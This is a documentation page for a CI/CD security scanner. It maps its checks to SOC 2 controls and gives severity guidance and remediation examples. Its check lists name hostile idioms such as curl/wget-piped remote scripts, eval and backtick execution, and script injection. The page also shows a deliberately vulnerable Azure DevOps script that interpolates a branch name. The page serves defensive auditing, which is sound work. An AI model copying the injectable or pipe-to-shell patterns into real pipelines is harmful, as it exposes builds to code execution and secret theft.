SOC 2 Trust Services Criteria
- Version: 2017 (revised 2022)
- URL: https://www.aicpa-cima.com/resources/download/2017-trust-services-criteria-with-revised-points-of-focus-2022
- Source of truth: pipeline_check/core/standards/data/soc2.py
SOC 2 Trust Services Criteria, CI/CD-relevant subset. Findings evidence control gaps; they are not a substitute for an auditor's opinion. Use this page to prepare CC6 / CC7 / CC8 evidence walks.
At a glance
- Controls in this standard: 11
- Controls evidenced by at least one check: 11 / 11
- Distinct checks evidencing this standard: 231
- Of those, autofixable with --fix: 71
How to read severity
Every check below ships at a fixed severity level. The scale is the same across providers and standards, so a CRITICAL finding in one place means the same thing as a CRITICAL finding anywhere else.
| Level | What it means | Examples |
|---|---|---|
| CRITICAL | Active exploit primitive in the workflow as written. Treat as P0: a default scan path lands an attacker on a secret, an RCE, or production write access without further effort. | Hardcoded credential literal, branch ref pointing at a known-compromised action, sign-in to an unverified registry. |
| HIGH | Production-impact gap that requires modest attacker effort or a second condition to weaponize. Remediate this sprint; the secondary condition is usually already present in real pipelines. | Action pinned to a floating tag, sensitive permissions on a low-popularity action, mutable container tag in prod. |
| MEDIUM | Significant defense-in-depth gap. Not directly exploitable on its own but disables a control whose absence widens the blast radius of a separate compromise. Backlog with a deadline. | Missing branch protection, container without resource limits, freshly-published dependency consumed before the cooldown window. |
| LOW | Hygiene / hardening issue. Not a vulnerability on its own but raises baseline posture and reduces audit friction. | Missing CI logging retention, SBOM without supplier attribution, ECR repo without scan-on-push. |
| INFO | Degraded-mode signal. The scanner couldn't reach an API or parse a config and surfaces the gap so the operator knows coverage was incomplete. No finding against the workload itself. | CB-000 CodeBuild API access failed, IAM-000 IAM enumeration failed. |
Coverage by control
Click a control ID to jump to the per-control section with the full check list. The severity mix column shows the spread of evidencing checks by severity (Critical / High / Medium / Low / Info).
| Control | Title | Checks | Severity mix |
|---|---|---|---|
| CC6.1 | Logical access controls restrict entities to authorized system resources | 37 | 9C · 16H · 10M · 2L |
| CC6.2 | New internal and external users are registered, authorized, and provisioned | 20 | 10C · 4H · 6M |
| CC6.3 | Access modifications (including revocation) are tracked and timely | 12 | 5H · 7M |
| CC6.6 | Boundary-protection measures restrict access from outside the system boundary | 31 | 11C · 7H · 12M · 1L |
| CC6.7 | Data in transit is protected from unauthorized disclosure | 14 | 10H · 3M · 1L |
| CC6.8 | Controls prevent or detect the introduction of malicious software | 58 | 11C · 33H · 14M |
| CC7.1 | Detection procedures identify configuration changes that introduce vulnerabilities | 6 | 2H · 3M · 1L |
| CC7.2 | System components are monitored for anomalies indicative of malicious acts or failures | 15 | 1H · 8M · 6L |
| CC7.3 | Security events are evaluated to determine if they require response | 1 | 1M |
| CC7.4 | Identified security incidents trigger a response process | 2 | 2M |
| CC8.1 | Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented | 53 | 23H · 28M · 2L |
Filter at runtime
Restrict a scan to checks that evidence this standard with --standard soc2:
```shell
# All providers, only checks tied to this standard
pipeline_check --standard soc2

# Compose with --pipeline to scope by provider
pipeline_check --pipeline github --standard soc2

# Compose with another standard to widen the lens
pipeline_check --pipeline aws --standard soc2 --standard owasp_cicd_top_10
```
Controls in scope
CC6.1: Logical access controls restrict entities to authorized system resources
Evidenced by 37 checks across 9 providers (AWS, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Kubernetes).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| BB-017 | Repository token written to persistent storage | CRITICAL | Bitbucket | 🔧 fix |
| BK-002 | Literal secret value in pipeline env block | CRITICAL | Buildkite | 🔧 fix |
| BK-005 | Container started with --privileged or host-bind escalation | HIGH | Buildkite | 🔧 fix |
| BK-006 | Step has no timeout_in_minutes | LOW | Buildkite | |
| CA-004 | CodeArtifact repo policy grants codeartifact:* with Resource '*' | HIGH | AWS | |
| CC-030 | Workflow job uses context without branch filter or approval gate | MEDIUM | CircleCI | |
| CCM-003 | CodeCommit trigger targets SNS/Lambda in a different account | MEDIUM | AWS | |
| DF-002 | Container runs as root (missing or root USER directive) | HIGH | Dockerfile | 🔧 fix |
| DF-006 | ENV or ARG carries a credential-shaped literal value | CRITICAL | Dockerfile | |
| DF-008 | RUN invokes docker --privileged or escalates capabilities | HIGH | Dockerfile | |
| DF-012 | RUN invokes sudo | HIGH | Dockerfile | |
| DF-019 | COPY/ADD source path looks like a credential file | HIGH | Dockerfile | 🔧 fix |
| DF-020 | ARG declares a credential-named build argument | HIGH | Dockerfile | 🔧 fix |
| GCB-002 | Cloud Build uses the default service account | HIGH | Cloud Build | |
| GHA-004 | Workflow has no explicit permissions block | MEDIUM | GitHub Actions | 🔧 fix |
| GHA-019 | GITHUB_TOKEN written to persistent storage | CRITICAL | GitHub Actions | 🔧 fix |
| GL-020 | CI_JOB_TOKEN written to persistent storage | CRITICAL | GitLab CI | 🔧 fix |
| IAM-001 | CI/CD role has AdministratorAccess policy attached | CRITICAL | AWS | |
| IAM-002 | CI/CD role has wildcard Action in attached policy | HIGH | AWS | |
| IAM-003 | CI/CD role has no permission boundary | MEDIUM | AWS | |
| IAM-004 | CI/CD role can PassRole to any role | HIGH | AWS | |
| IAM-006 | Sensitive actions granted with wildcard Resource | MEDIUM | AWS | |
| K8S-011 | Pod serviceAccountName unset or 'default' | MEDIUM | Kubernetes | |
| K8S-012 | Pod automountServiceAccountToken not false | MEDIUM | Kubernetes | |
| K8S-017 | Container env value carries a credential-shaped literal | CRITICAL | Kubernetes | |
| K8S-018 | Secret stringData/data carries a credential-shaped literal | CRITICAL | Kubernetes | |
| K8S-019 | Workload deployed in the 'default' namespace | LOW | Kubernetes | |
| K8S-020 | ClusterRoleBinding grants cluster-admin or system:masters | CRITICAL | Kubernetes | 🔧 fix |
| K8S-021 | Role or ClusterRole grants wildcard verbs+resources | HIGH | Kubernetes | |
| K8S-029 | RoleBinding grants permissions to the default ServiceAccount | HIGH | Kubernetes | 🔧 fix |
| K8S-034 | ServiceAccount automountServiceAccountToken not explicitly false | MEDIUM | Kubernetes | |
| K8S-037 | ConfigMap data carries a credential-shaped literal | HIGH | Kubernetes | |
| KMS-002 | KMS key policy grants wildcard KMS actions | HIGH | AWS | |
| PBAC-001 | CodeBuild project has no VPC configuration | HIGH | AWS | |
| PBAC-002 | CodeBuild service role shared across multiple projects | MEDIUM | AWS | |
| PBAC-003 | CodeBuild security group allows 0.0.0.0/0 all-port egress | MEDIUM | AWS | |
| PBAC-005 | CodePipeline stage action roles mirror the pipeline role | HIGH | AWS | |
CC6.2: New internal and external users are registered, authorized, and provisioned
Evidenced by 20 checks across 8 providers (AWS, Azure DevOps, Bitbucket, CircleCI, Cloud Build, GitHub Actions, GitLab CI, Jenkins).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-003 | Variables contain literal secret values | CRITICAL | Azure DevOps | |
| ADO-008 | Credential-shaped literal in pipeline body | CRITICAL | Azure DevOps | 🔧 fix |
| ADO-014 | AWS auth uses long-lived access keys | MEDIUM | Azure DevOps | 🔧 fix |
| BB-003 | Variables contain literal secret values | CRITICAL | Bitbucket | |
| BB-008 | Credential-shaped literal in pipeline body | CRITICAL | Bitbucket | 🔧 fix |
| BB-011 | AWS auth uses long-lived access keys | MEDIUM | Bitbucket | 🔧 fix |
| CB-001 | Secrets in plaintext environment variables | CRITICAL | AWS | |
| CC-005 | AWS auth uses long-lived access keys in environment block | MEDIUM | CircleCI | 🔧 fix |
| CC-008 | Credential-shaped literal in config body | CRITICAL | CircleCI | 🔧 fix |
| GCB-003 | Secret Manager value referenced in step args | HIGH | Cloud Build | |
| GHA-005 | AWS auth uses long-lived access keys | MEDIUM | GitHub Actions | 🔧 fix |
| GHA-008 | Credential-shaped literal in workflow body | CRITICAL | GitHub Actions | 🔧 fix |
| GL-003 | Variables contain literal secret values | CRITICAL | GitLab CI | |
| GL-008 | Credential-shaped literal in pipeline body | CRITICAL | GitLab CI | 🔧 fix |
| GL-013 | AWS auth uses long-lived access keys | MEDIUM | GitLab CI | 🔧 fix |
| IAM-005 | CI/CD role trust policy missing sts:ExternalId | HIGH | AWS | |
| IAM-008 | OIDC-federated role trust policy missing audience or subject pin | HIGH | AWS | |
| JF-004 | AWS auth uses long-lived access keys via withCredentials | MEDIUM | Jenkins | 🔧 fix |
| JF-008 | Credential-shaped literal in pipeline body | CRITICAL | Jenkins | 🔧 fix |
| JF-010 | Long-lived AWS keys exposed via environment {} block | HIGH | Jenkins | 🔧 fix |
CC6.3: Access modifications (including revocation) are tracked and timely
Evidenced by 12 checks across 8 providers (AWS, Azure DevOps, Bitbucket, CircleCI, Cloud Build, GitHub Actions, GitLab CI, Jenkins).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-014 | AWS auth uses long-lived access keys | MEDIUM | Azure DevOps | 🔧 fix |
| BB-011 | AWS auth uses long-lived access keys | MEDIUM | Bitbucket | 🔧 fix |
| CB-006 | CodeBuild source auth uses long-lived token | HIGH | AWS | |
| CC-005 | AWS auth uses long-lived access keys in environment block | MEDIUM | CircleCI | 🔧 fix |
| CC-019 | add_ssh_keys without fingerprint restriction | HIGH | CircleCI | |
| CP-004 | Legacy ThirdParty/GitHub source action (OAuth token) | HIGH | AWS | |
| GCB-007 | availableSecrets references versions/latest | MEDIUM | Cloud Build | 🔧 fix |
| GHA-005 | AWS auth uses long-lived access keys | MEDIUM | GitHub Actions | 🔧 fix |
| GL-013 | AWS auth uses long-lived access keys | MEDIUM | GitLab CI | 🔧 fix |
| IAM-005 | CI/CD role trust policy missing sts:ExternalId | HIGH | AWS | |
| IAM-007 | IAM user has access key older than 90 days | HIGH | AWS | |
| JF-004 | AWS auth uses long-lived access keys via withCredentials | MEDIUM | Jenkins | 🔧 fix |
CC6.6: Boundary-protection measures restrict access from outside the system boundary
Evidenced by 31 checks across 9 providers (AWS, Azure DevOps, Bitbucket, CircleCI, Dockerfile, GitHub Actions, GitLab CI, Jenkins, Kubernetes).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-013 | Self-hosted pool without explicit ephemeral marker | MEDIUM | Azure DevOps | |
| ADO-017 | Docker run with insecure flags (privileged/host mount) | CRITICAL | Azure DevOps | 🔧 fix |
| BB-013 | Docker run with insecure flags (privileged/host mount) | CRITICAL | Bitbucket | 🔧 fix |
| BB-016 | Self-hosted runner without ephemeral marker | MEDIUM | Bitbucket | |
| CB-002 | Privileged mode enabled | HIGH | AWS | |
| CC-010 | Self-hosted runner without ephemeral marker | MEDIUM | CircleCI | |
| CC-017 | Docker run with insecure flags (privileged/host mount) | CRITICAL | CircleCI | 🔧 fix |
| CP-003 | Source stage using polling instead of event-driven trigger | LOW | AWS | |
| CP-007 | CodePipeline v2 PR trigger accepts all branches | HIGH | AWS | |
| DF-013 | EXPOSE declares sensitive remote-access port | CRITICAL | Dockerfile | 🔧 fix |
| ECR-003 | Repository policy allows public access | CRITICAL | AWS | |
| GHA-012 | Self-hosted runner without ephemeral marker | MEDIUM | GitHub Actions | |
| GHA-017 | Docker run with insecure flags (privileged/host mount) | CRITICAL | GitHub Actions | 🔧 fix |
| GHA-026 | Container job disables isolation via options: | HIGH | GitHub Actions | |
| GL-014 | Self-managed runner without ephemeral tag | MEDIUM | GitLab CI | |
| GL-017 | Docker run with insecure flags (privileged/host mount) | CRITICAL | GitLab CI | 🔧 fix |
| JF-003 | Pipeline uses agent any (no executor isolation) | MEDIUM | Jenkins | |
| JF-014 | Agent label missing ephemeral marker | MEDIUM | Jenkins | |
| JF-017 | Docker run with insecure flags (privileged/host mount) | CRITICAL | Jenkins | 🔧 fix |
| JF-025 | Kubernetes agent pod template runs privileged or mounts hostPath | HIGH | Jenkins | |
| K8S-002 | Pod hostNetwork: true | HIGH | Kubernetes | 🔧 fix |
| K8S-022 | Service exposes SSH (port 22) | MEDIUM | Kubernetes | |
| K8S-026 | LoadBalancer Service has no loadBalancerSourceRanges | HIGH | Kubernetes | |
| K8S-028 | Container declares hostPort | MEDIUM | Kubernetes | 🔧 fix |
| K8S-032 | Namespace lacks default-deny NetworkPolicy | MEDIUM | Kubernetes | |
| K8S-038 | NetworkPolicy ingress / egress allows all sources or destinations | MEDIUM | Kubernetes | |
| LMB-002 | Lambda function URL has AuthType=NONE | HIGH | AWS | |
| LMB-004 | Lambda resource policy allows wildcard principal | CRITICAL | AWS | |
| S3-001 | Artifact bucket public access block not fully enabled | CRITICAL | AWS | |
| S3-005 | Artifact bucket missing aws:SecureTransport deny | MEDIUM | AWS | |
| SM-002 | Secrets Manager resource policy allows wildcard principal | CRITICAL | AWS | |
CC6.7: Data in transit is protected from unauthorized disclosure
Evidenced by 14 checks across 11 providers (AWS, Azure DevOps, Bitbucket, Buildkite, CircleCI, Dockerfile, GitHub Actions, GitLab CI, Helm, Jenkins, Kubernetes).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-023 | TLS / certificate verification bypass | HIGH | Azure DevOps | 🔧 fix |
| BB-023 | TLS / certificate verification bypass | HIGH | Bitbucket | 🔧 fix |
| BK-004 | Remote script piped into shell interpreter | HIGH | Buildkite | 🔧 fix |
| BK-008 | TLS verification disabled in step command | MEDIUM | Buildkite | 🔧 fix |
| CC-023 | TLS / certificate verification bypass | HIGH | CircleCI | 🔧 fix |
| DF-003 | ADD pulls remote URL without integrity verification | HIGH | Dockerfile | |
| DF-004 | RUN executes a remote script via curl-pipe / wget-pipe | HIGH | Dockerfile | |
| GHA-023 | TLS / certificate verification bypass | HIGH | GitHub Actions | 🔧 fix |
| GL-023 | TLS / certificate verification bypass | HIGH | GitLab CI | 🔧 fix |
| HELM-003 | Chart dependency declared on a non-HTTPS repository | HIGH | Helm | 🔧 fix |
| HELM-009 | Chart home / sources URL uses a non-HTTPS scheme | LOW | Helm | |
| JF-023 | TLS / certificate verification bypass | HIGH | Jenkins | 🔧 fix |
| K8S-027 | Ingress has no TLS configuration | MEDIUM | Kubernetes | |
| S3-005 | Artifact bucket missing aws:SecureTransport deny | MEDIUM | AWS | |
CC6.8: Controls prevent or detect the introduction of malicious software
Evidenced by 58 checks across 11 providers (AWS, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Jenkins, Kubernetes).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-002 | Script injection via attacker-controllable context | HIGH | Azure DevOps | |
| ADO-016 | Remote script piped to shell interpreter | HIGH | Azure DevOps | 🔧 fix |
| ADO-020 | No vulnerability scanning step | MEDIUM | Azure DevOps | |
| ADO-026 | Pipeline contains indicators of malicious activity | CRITICAL | Azure DevOps | |
| ADO-027 | Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | Azure DevOps | |
| BB-002 | Script injection via attacker-controllable context | HIGH | Bitbucket | |
| BB-012 | Remote script piped to shell interpreter | HIGH | Bitbucket | 🔧 fix |
| BB-015 | No vulnerability scanning step | MEDIUM | Bitbucket | |
| BB-025 | Pipeline contains indicators of malicious activity | CRITICAL | Bitbucket | |
| BB-026 | Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | Bitbucket | |
| BK-003 | Untrusted Buildkite variable interpolated in command | HIGH | Buildkite | |
| BK-005 | Container started with --privileged or host-bind escalation | HIGH | Buildkite | 🔧 fix |
| CB-011 | CodeBuild buildspec contains indicators of malicious activity | CRITICAL | AWS | |
| CC-002 | Script injection via untrusted environment variable | HIGH | CircleCI | |
| CC-016 | Remote script piped to shell interpreter | HIGH | CircleCI | 🔧 fix |
| CC-020 | No vulnerability scanning step | MEDIUM | CircleCI | |
| CC-026 | Config contains indicators of malicious activity | CRITICAL | CircleCI | |
| CC-027 | Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | CircleCI | |
| DF-002 | Container runs as root (missing or root USER directive) | HIGH | Dockerfile | 🔧 fix |
| DF-005 | RUN uses shell-eval (eval / sh -c on a variable / backticks) | HIGH | Dockerfile | |
| DF-008 | RUN invokes docker --privileged or escalates capabilities | HIGH | Dockerfile | |
| DF-013 | EXPOSE declares sensitive remote-access port | CRITICAL | Dockerfile | 🔧 fix |
| DF-014 | WORKDIR set to a system / kernel filesystem path | CRITICAL | Dockerfile | |
| DF-015 | RUN grants world-writable permissions (chmod 777 / a+w) | MEDIUM | Dockerfile | |
| DF-017 | ENV PATH prepends a world-writable directory | MEDIUM | Dockerfile | 🔧 fix |
| DF-018 | RUN chown rewrites ownership of a system path | MEDIUM | Dockerfile | |
| ECR-001 | Image scanning on push not enabled | HIGH | AWS | |
| ECR-007 | Inspector v2 enhanced scanning disabled for ECR | MEDIUM | AWS | |
| GCB-006 | Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | Cloud Build | |
| GCB-008 | No vulnerability scanning step in Cloud Build pipeline | MEDIUM | Cloud Build | |
| GHA-003 | Script injection via untrusted context | HIGH | GitHub Actions | 🔧 fix |
| GHA-016 | Remote script piped to shell interpreter | HIGH | GitHub Actions | 🔧 fix |
| GHA-020 | No vulnerability scanning step | MEDIUM | GitHub Actions | |
| GHA-027 | Workflow contains indicators of malicious activity | CRITICAL | GitHub Actions | |
| GHA-028 | Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | GitHub Actions | |
| GL-002 | Script injection via untrusted commit/MR context | HIGH | GitLab CI | |
| GL-016 | Remote script piped to shell interpreter | HIGH | GitLab CI | 🔧 fix |
| GL-019 | No vulnerability scanning step | MEDIUM | GitLab CI | |
| GL-025 | Pipeline contains indicators of malicious activity | CRITICAL | GitLab CI | |
| GL-026 | Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | GitLab CI | |
| JF-002 | Script step interpolates attacker-controllable env var | HIGH | Jenkins | |
| JF-016 | Remote script piped to shell interpreter | HIGH | Jenkins | 🔧 fix |
| JF-020 | No vulnerability scanning step | MEDIUM | Jenkins | |
| JF-029 | Jenkinsfile contains indicators of malicious activity | CRITICAL | Jenkins | |
| JF-030 | Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | Jenkins | |
| K8S-003 | Pod hostPID: true | HIGH | Kubernetes | 🔧 fix |
| K8S-004 | Pod hostIPC: true | HIGH | Kubernetes | 🔧 fix |
| K8S-005 | Container securityContext.privileged: true | CRITICAL | Kubernetes | 🔧 fix |
| K8S-006 | Container allowPrivilegeEscalation not explicitly false | HIGH | Kubernetes | 🔧 fix |
| K8S-007 | Container runAsNonRoot not true / runAsUser is 0 | HIGH | Kubernetes | 🔧 fix |
| K8S-008 | Container readOnlyRootFilesystem not true | MEDIUM | Kubernetes | 🔧 fix |
| K8S-009 | Container capabilities not dropping ALL / adding dangerous caps | HIGH | Kubernetes | |
| K8S-010 | Container seccompProfile not RuntimeDefault or Localhost | MEDIUM | Kubernetes | |
| K8S-013 | Pod uses a hostPath volume | HIGH | Kubernetes | 🔧 fix |
| K8S-014 | Pod hostPath references a sensitive host directory | CRITICAL | Kubernetes | |
| K8S-035 | Container securityContext.runAsUser is 0 | HIGH | Kubernetes | |
| K8S-039 | Pod uses shareProcessNamespace: true | MEDIUM | Kubernetes | |
| K8S-040 | Container securityContext.procMount: Unmasked | HIGH | Kubernetes | |
CC7.1: Detection procedures identify configuration changes that introduce vulnerabilities
Evidenced by 6 checks across 4 providers (AWS, Buildkite, Cloud Build, Kubernetes).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| BK-012 | No vulnerability scanning step | MEDIUM | Buildkite | |
| CB-005 | Outdated managed build image | MEDIUM | AWS | |
| ECR-002 | Image tags are mutable | HIGH | AWS | |
| GCB-007 | availableSecrets references versions/latest | MEDIUM | Cloud Build | 🔧 fix |
| K8S-023 | Namespace missing Pod Security Admission enforcement label | HIGH | Kubernetes | |
| K8S-031 | Namespace missing PSA warn label | LOW | Kubernetes | |
CC7.2: System components are monitored for anomalies indicative of malicious acts or failures
Evidenced by 15 checks across 5 providers (AWS, CircleCI, Dockerfile, Jenkins, Kubernetes).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| CB-003 | Build logging not enabled | MEDIUM | AWS | |
| CC-011 | No store_test_results step (test results not archived) | LOW | CircleCI | |
| CT-001 | No active CloudTrail trail in region | HIGH | AWS | |
| CT-002 | CloudTrail log-file validation disabled | MEDIUM | AWS | |
| CT-003 | CloudTrail trail is not multi-region | MEDIUM | AWS | |
| CW-001 | No CloudWatch alarm on CodeBuild FailedBuilds metric | LOW | AWS | |
| CWL-001 | CodeBuild log group has no retention policy | LOW | AWS | |
| CWL-002 | CodeBuild log group not KMS-encrypted | MEDIUM | AWS | |
| DF-007 | No HEALTHCHECK directive declared | LOW | Dockerfile | 🔧 fix |
| EB-001 | No EventBridge rule for CodePipeline failure notifications | MEDIUM | AWS | |
| JF-011 | Pipeline has no buildDiscarder retention policy | LOW | Jenkins | 🔧 fix |
| K8S-024 | Container missing both livenessProbe and readinessProbe | MEDIUM | Kubernetes | |
| K8S-033 | Namespace lacks ResourceQuota or LimitRange | MEDIUM | Kubernetes | |
| S3-003 | Artifact bucket versioning not enabled | MEDIUM | AWS | |
| S3-004 | Artifact bucket access logging not enabled | LOW | AWS | |
CC7.3: Security events are evaluated to determine if they require response
Evidenced by 1 check from a single provider (AWS).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| CD-003 | No CloudWatch alarm monitoring on deployment group | MEDIUM | AWS | |
CC7.4: Identified security incidents trigger a response process
Evidenced by 2 checks from a single provider (AWS).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| CD-001 | Automatic rollback on failure not enabled | MEDIUM | AWS | |
| CD-003 | No CloudWatch alarm monitoring on deployment group | MEDIUM | AWS | |
CC8.1: Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented
Evidenced by 53 checks across 12 providers (AWS, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, Jenkins, Kubernetes).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-001 | Task reference not pinned to specific version | HIGH | Azure DevOps | 🔧 fix |
| ADO-004 | Deployment job missing environment binding | MEDIUM | Azure DevOps | |
| ADO-024 | No SLSA provenance attestation produced | MEDIUM | Azure DevOps | |
| ADO-025 | Cross-repo template not pinned to commit SHA | HIGH | Azure DevOps | |
| BB-001 | pipe: action not pinned to exact version | HIGH | Bitbucket | 🔧 fix |
| BB-004 | Deploy step missing deployment: environment gate | MEDIUM | Bitbucket | |
| BB-024 | No SLSA provenance attestation produced | MEDIUM | Bitbucket | |
| BK-001 | Buildkite plugin not pinned to an exact version | HIGH | Buildkite | |
| BK-004 | Remote script piped into shell interpreter | HIGH | Buildkite | 🔧 fix |
| BK-007 | Deploy step not gated by a manual block / input | MEDIUM | Buildkite | |
| BK-009 | Artifacts not signed (no cosign/sigstore step) | MEDIUM | Buildkite | |
| BK-010 | No SBOM generated for build artifacts | MEDIUM | Buildkite | |
| BK-011 | No SLSA provenance attestation produced | MEDIUM | Buildkite | |
| BK-013 | Deploy step has no branches: filter | MEDIUM | Buildkite | |
| CB-008 | CodeBuild buildspec is inline (not sourced from a protected repo) | HIGH | AWS | |
| CC-001 | Orb not pinned to exact semver | HIGH | CircleCI | 🔧 fix |
| CC-009 | Deploy job missing manual approval gate | MEDIUM | CircleCI | |
| CC-013 | Deploy job in workflow has no branch filter | MEDIUM | CircleCI | |
| CC-024 | No SLSA provenance attestation produced | MEDIUM | CircleCI | |
| CCM-001 | CodeCommit repository has no approval rule template attached | HIGH | AWS | |
| CD-002 | AllAtOnce deployment config, no canary or rolling strategy | HIGH | AWS | |
| CP-001 | No approval action before deploy stages | HIGH | AWS | |
| CP-005 | Production Deploy stage has no preceding ManualApproval | MEDIUM | AWS | |
| DF-001 | FROM image not pinned to sha256 digest | HIGH | Dockerfile | 🔧 fix |
| DF-003 | ADD pulls remote URL without integrity verification | HIGH | Dockerfile | |
| DF-004 | RUN executes a remote script via curl-pipe / wget-pipe | HIGH | Dockerfile | |
| DF-010 | apt-get dist-upgrade / upgrade pulls unknown package versions | LOW | Dockerfile | |
| DF-016 | Image lacks OCI provenance labels | LOW | Dockerfile | |
| GCB-001 | Cloud Build step image not pinned by digest | HIGH | Cloud Build | 🔧 fix |
| GCB-009 | Artifacts not signed (no cosign / sigstore step) | MEDIUM | Cloud Build | |
| GHA-001 | Action not pinned to commit SHA | HIGH | GitHub Actions | 🔧 fix |
| GHA-014 | Deploy job missing environment binding | MEDIUM | GitHub Actions | 🔧 fix |
| GHA-024 | No SLSA provenance attestation produced | MEDIUM | GitHub Actions | |
| GHA-025 | Reusable workflow not pinned to commit SHA | HIGH | GitHub Actions | |
| GL-001 | Image not pinned to specific version or digest | HIGH | GitLab CI | 🔧 fix |
| GL-004 | Deploy job lacks manual approval or environment gate | MEDIUM | GitLab CI | |
| GL-005 | include: pulls remote / project without pinned ref | HIGH | GitLab CI | |
| GL-024 | No SLSA provenance attestation produced | MEDIUM | GitLab CI | |
| GL-029 | Manual deploy job defaults to allow_failure: true | MEDIUM | GitLab CI | |
| HELM-001 | Chart.yaml declares legacy apiVersion: v1 | MEDIUM | Helm | 🔧 fix |
| HELM-002 | Chart.lock missing per-dependency digests | HIGH | Helm | 🔧 fix |
| HELM-003 | Chart dependency declared on a non-HTTPS repository | HIGH | Helm | 🔧 fix |
| HELM-004 | Chart dependency version is a range, not an exact pin | MEDIUM | Helm | |
| HELM-008 | Chart.lock generated more than 90 days ago | MEDIUM | Helm | |
| JF-001 | Shared library not pinned to a tag or commit | HIGH | Jenkins | |
| JF-005 | Deploy stage missing manual input approval | MEDIUM | Jenkins | |
| JF-024 | input approval step missing submitter restriction | MEDIUM | Jenkins | |
| JF-026 | build job: trigger ignores downstream failure | MEDIUM | Jenkins | |
| JF-028 | No SLSA provenance attestation produced | MEDIUM | Jenkins | |
| K8S-001 | Container image not pinned by sha256 digest | HIGH | Kubernetes | 🔧 fix |
| K8S-036 | ServiceAccount imagePullSecrets references missing Secret | MEDIUM | Kubernetes | |
| SIGN-001 | No AWS Signer profile defined for Lambda deploys | MEDIUM | AWS | |
| SIGN-002 | AWS Signer profile is revoked or inactive | HIGH | AWS | |
Check details
Every check that evidences this standard, rendered once with its detection mechanism, recommendation, and any known false-positive modes or real-world incident references. The per-control tables above link to the matching block here.
ADO-001: Task reference not pinned to specific version HIGH 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Floating-major task references (@1, @2) can roll forward silently when the task publisher ships a breaking or malicious update. Pass when every task: reference carries a two- or three-segment semver.
Recommendation. Reference tasks by a full semver (DownloadSecureFile@1.2.3) or extension-published-version. Track task updates explicitly via Azure DevOps extension settings rather than letting @1 drift.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ADO-001 in the Azure DevOps provider.
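A minimal before/after sketch of the two reference shapes (task and file names illustrative):

```yaml
steps:
  # Flagged: floating major version — the publisher can roll this
  # reference forward without any change in the repo
  - task: DownloadSecureFile@1
    inputs:
      secureFile: signing-cert.pfx

  # Passes: full semver pin — updates require an explicit edit
  - task: DownloadSecureFile@1.2.3
    inputs:
      secureFile: signing-cert.pfx
```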
ADO-002: Script injection via attacker-controllable context HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. $(Build.SourceBranch*), $(Build.SourceVersionMessage), and $(System.PullRequest.*) are populated from SCM event metadata the attacker controls. Inline interpolation into a script body executes crafted content.
Recommendation. Pass these values through an intermediate pipeline variable declared with readonly: true, and reference that variable through an environment variable rather than $(...) macro interpolation. ADO expands $(…) before shell quoting, so inline use is never safe.
Source: ADO-002 in the Azure DevOps provider.
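A sketch of the unsafe and safer shapes (step contents illustrative):

```yaml
steps:
  # Unsafe: $(…) is macro-expanded into the script text before the
  # shell runs it, so a crafted branch name executes as shell code
  - script: echo "Building $(Build.SourceBranchName)"

  # Safer: the value arrives via an environment variable, and the
  # shell treats it as data rather than command text
  - script: echo "Building $BRANCH"
    env:
      BRANCH: $(Build.SourceBranchName)
```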
ADO-003: Variables contain literal secret values CRITICAL
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Scans variables: in both the mapping form ({KEY: VAL}) and the list form ([{name: X, value: Y}]) that ADO supports. AWS keys are detected by value shape regardless of variable name.
Recommendation. Store secrets in an Azure Key Vault or a Library variable group with the secret flag set; reference them via $(SECRET_NAME) at runtime. For cloud access prefer Azure workload identity federation.
Source: ADO-003 in the Azure DevOps provider.
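A sketch of the remediated shape using the `AzureKeyVault@2` task; the service connection, vault, and secret names are illustrative:

```yaml
steps:
  # Pull the secret from Key Vault at runtime; nothing lands in the repo
  - task: AzureKeyVault@2
    inputs:
      azureSubscription: my-azure-connection   # hypothetical service connection
      KeyVaultName: my-vault                   # hypothetical vault name
      SecretsFilter: 'DB_PASSWORD'
  - script: ./deploy.sh
    env:
      DB_PASSWORD: $(DB_PASSWORD)   # injected as a secret variable, masked in logs
```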
ADO-004: Deployment job missing environment binding MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Without an environment: binding, ADO cannot enforce approvals, checks, or deployment history against a named resource. Every deployment: job should bind one.
Recommendation. Add environment: <name> to every deployment: job. Configure approvals, required branches, and business-hours checks on the matching Environment in the ADO UI.
Source: ADO-004 in the Azure DevOps provider.
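The remediated shape under ADO's `deployment` job syntax (environment name illustrative):

```yaml
jobs:
  - deployment: deploy_prod
    environment: production   # approvals and checks attach to this Environment
    strategy:
      runOnce:
        deploy:
          steps:
            - script: ./deploy.sh
```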
